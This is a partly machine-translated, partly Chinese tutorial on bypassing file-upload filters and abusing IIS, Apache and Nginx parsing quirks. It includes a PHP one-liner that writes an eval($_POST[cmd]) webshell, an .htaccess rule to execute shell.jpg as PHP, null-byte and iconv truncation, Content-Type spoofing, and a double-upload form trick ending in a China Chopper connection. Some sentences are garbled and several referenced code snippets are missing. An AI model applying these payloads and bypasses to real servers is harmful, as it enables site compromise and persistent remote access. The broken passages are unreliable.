Talking about file parsing and uploading vulnerabilities
file parsing vulnerability
Parsing vulnerabilities are mainly caused by some special files being interpreted into script file format by IIS, Apache, Nginx and other services under certain circumstances and executed.
iis 5.x/6.0 parsing vulnerability
There are three main types of IIS6.0 parsing vulnerabilities:
1. Directory parsing vulnerability/xx.asp/xx.jpg
Create a folder named .asp and .asa under the website, and any file with an extension in the directory will be parsed and executed by iis as an asp file. Therefore, as long as the attacker can directly upload the picture through this vulnerability, and do not need to change the suffix name!
2. File parsing xx.asp;.jpg
Under iis6.0, the semicolon is not parsed, so xx.asp;.jpg is parsed as an asp script to execute.
3. File type parsing asa/cer/cdx
In addition to asp, the default executable file of iis6.0 also contains these three kinds of asa, cer, and cdx.
Apache parsing vulnerability
Apache parses the file mainly from right to left and parses it. If it is judged to be an unparseable type, it continues to parse to the left. For example, xx.php.wer.xxxxx will be parsed as a PHP type.
IIS 7.0/ Nginx <8.03 Malformed Parsing Vulnerability
When the default Fast-CGI is enabled, the upload name is xx.jpg, and the content is:
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
Then visit xx.jpg/.php, a sentence Trojan shell.php will be generated in this directory.
Nginx<8.03 Null Byte Code Execution Vulnerability
nginx versions are as follows: 0.5. , 0.6. , 0.7 <= 0.7.65, 0.8 <= 0.8.37 When PHP-FastCGI is used to execute php, the URL is inconsistent with FastCGI when it encounters %00 null bytes, resulting in You can embed PHP code in an image and execute the code by accessing xxx.jpg%00.php.
Another Nginx file vulnerability is to parse from left to right, which can not only bypass the restriction on suffix names, but also upload Trojan files, so XXX. But you can try it under other conditions that fail). as follows:
Content-Disposition: form-data; name="userfiles"; filename="XXX.jpg.php"
htaccess file parsing
If .htaccess is executable and uploadable in Apache, try writing in .htaccess:
<FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch>
Then upload the Trojan horse of shell.jpg, so that shell.jpg can be parsed as a PHP file.
Operating system analysis
Since windows will filter the spaces and dots in the suffix of the file, if the blacklist verification is encountered, such as the restriction does not allow the upload of PHP files, and the system is a windows system, then we can upload xx.php, or xx .php. In this way, you can bypass the blacklist check for file uploads!
File upload vulnerability
file header spoofing vulnerability
Adding GIF89a in front of a sentence Trojan, and then saving the Trojan as a picture format, can deceive a simple waf.
filepath vulnerability
The filepath vulnerability is mainly used to break through the automatic naming rules of the server. There are two main ways to use it:
1、改变文件上传后路径(filepath),可以结合目录解析漏洞,路径/x.asp/
2、直接改变文件名称(都是在filepath下进行修改),路径/x.asp;.
%00截断
%00截断的两种利用方式:
1、更改filename,xx.php .jpg,在burpsuit中将空格对应的hex 20改为00
2、更改filename,xx.php%00.jpg,在burpsuit中将%00进行右键转换-url-urldecoder
filetype漏洞
filetype漏洞主要是针对content-type字段,主要有两种利用方式:
1、先上传一个图片,然后将content-type:images/jpeg改为content-type:text/asp,然后对
filename进行00截断,将图片内容替换为一句话木马。
2、直接使用burp抓包,得到post上传数据后,将Content-Type: text/plain改成 Content- Type: image/gif。
iconv函数限制上传
如果某天你上传文件发现,不敢你上传什么文件,上传后的文件都会自动添加一个.jpg的后缀,那么我们可以怀疑是否是使用iconv这个函数进行了上传的限制,此时我们可以使用类似00截断的方法,但是这里不是00截断,二是80-EF截断,也就是说我们可以修改HEX为80到EF中的某一个来进行截断,如果真是使用这个函数的话,那么恭喜你上传任意文件成功!如上传一个xx.php ,然后截断抓包将后面的空格对应的十六进制改为80到EF中的任意一个!
双文件上传
再一个文件上传的地方,右键审查元素,首先修改action为完整路径,然后复制粘贴上传浏览文件(<input ......),这样就会出现两个上传框,第一个上传正常文件,第二个选择一句话木马,然后提交。!参考链接
下面是一个上传地址:
右键—查看源代码,修改2处代码:
修改后:
保存为1.html
第一个上传选择正常的jpg图片,第2个选择我们的马,
这里asp过滤了,所以我选择cdx
成功突破,
右键—查看源代码
菜刀连接:
表单提交按钮
我们有时扫描发现上传路径,可是只有一个浏览文件,却没有提交按钮,此时我们就需要写入提交按钮。
写入表单:
F12审查元素,在选择文件表单下面添加提交按钮代码。
<input type="submit" value="提交" name="xx">